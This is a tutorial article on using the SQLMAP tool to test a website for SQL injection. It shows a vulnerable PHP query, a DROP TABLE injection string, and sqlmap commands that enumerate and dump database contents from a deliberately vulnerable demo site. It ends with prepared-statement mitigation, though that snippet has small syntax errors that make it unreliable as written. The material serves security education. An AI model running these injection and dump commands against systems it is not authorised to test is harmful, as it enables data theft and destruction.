Open In App

We use cookies to ensure you have the best browsing experience on our website. By using our site, you acknowledge that you have read and understood our Cookie Policy & Privacy Policy

How to use SQLMAP to test a website for SQL Injection vulnerability

This article explains how to test whether a website is safe from SQL injection using the SQLMAP penetration testing tool. 

What is SQL Injection?



SQL Injection is a code injection technique where an attacker executes malicious SQL queries that control a web application’s database. With the right set of queries, a user can gain access to information stored in databases. SQLMAP tests whether a ‘GET’ parameter is vulnerable to SQL Injection. 

For example, Consider the following php code segment: 



$variable = $_POST['input'];
mysql_query("INSERT INTO `table` (`column`) VALUES ('$variable')");

If the user enters “value’); DROP TABLE table;–” as the input, the query becomes 

INSERT INTO `table` (`column`) VALUES('value'); DROP TABLE table;--')

which is undesirable for us, as here the user input is directly compiled along with the pre-written sql query. Hence the user will be able to enter an sql query required to manipulate the database. 

Where can you use SQLMAP?

If you observe a web url that is of the form http://testphp.vulnweb.com/listproducts.php?cat=1, where the ‘GET’ parameter is in bold, then the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, SQLMAP works when it is php based. 

A simple test to check whether your website is vulnerable would be to replace the value in the get request parameter with an asterisk (*). For example, 

http://testphp.vulnweb.com/listproducts.php?cat=*

If this results in an error such as the error given above, then we can conclusively say that the website is vulnerable. 

 Installing sqlmap

SQLMAP comes pre-installed with kali Linux, which is the preferred choice of most penetration testers. However, you can install sqlmap on other debian based linux systems using the command 

 sudo apt-get install sqlmap

Usage

In this article, we will make use of a website that is designed with vulnerabilities for demonstration purposes: 

 http://testphp.vulnweb.com/listproducts.php?cat=1

As you can see, there is a GET request parameter (cat = 1) that can be changed by the user by modifying the value of cat. So this website might be vulnerable to SQL injection of this kind. 
To test for this, we use SQLMAP. To look at the set of parameters that can be passed, type in the terminal, 

 sqlmap -h

The parameters that we will use for the basic SQL Injection are shown in the above picture. Along with these, we will also use the –dbs and -u parameter, the usage of which has been explained in Step 1. 
Using SQLMAP to test a website for SQL Injection vulnerability: 

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs 

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 
-D acuart --tables

Tables

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 
-D acuart -T artists --columns

Columns

 sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
-D acuart -T artists -C aname --dump

Prevent SQL Injection

SQL injection can be generally prevented by using Prepared Statements . When we use a prepared statement, we are basically using a template for the code and analyzing the code and user input separately. It does not mix the user entered query and the code. In the example given at the beginning of this article, the input entered by the user is directly inserted into the code and they are compiled together, and hence we are able to execute malicious code. For prepared statements, we basically send the sql query with a placeholder for the user input and then send the actual user input as a separate command. 
Consider the following php code segment. 

$db = new PDO('connection details');
$stmt = db->prepare("Select name from users where id = :id");
$stmt->execute(array(':id', $data));

In this code, the user input is not combined with the prepared statement. They are compiled separately. So even if malicious code is entered as user input, the program will simply treat the malicious part of the code as a string and not a command. 

Note: This application is to be used solely for testing purposes

Related Article 
Basic SQL injection and mitigation 

Reference:stackoverflow.com 

 

Article Tags :
GBlog
Misc
Recommended Articles
1. SQL Injection
2. Basic SQL Injection and Mitigation with Example
3. What is components with known Vulnerability ?
4. What is Apache Log4j Vulnerability?
5. Spectre Security Vulnerability
6. Spring Dependency Injection with Example
7. How to Use WordPress: Complete Guide to Make a Website Using WordPress
8. 10 Best Website Analytics Tools to Use in 2024
9. How to Prepare for eLitmus Hiring Potential Test (pH Test)?
10. Test Case vs Test Scenario
11. SQL vs NoSQL: Which one is better to use?
12. Making your WordPress Website More Secure
13. 8 Ways to Shipwreck Your Next Website Design
14. Top 7 Code Sharing Website For Developers
15. Ways to track a Website
16. How to Launch a WordPress Website using Amazon EC2 Server ?
17. Top 10 Free Resources For App And Website Themes
18. How to Create a Google Calendar and Embed into your website ?
19. Important Reasons for Selecting Weebly for Building a Website
20. 7 main components of a website
21. 7 Tips to Protect your Website from Hackers
22. Tips for Website Building - From Development to Monetization Phase
23. Website Hosting and Premium Domain for Free
24. Things to Keep in Mind To Improve Your Website Performance
25. Top 12 jQuery Plugins For Enhancing a Website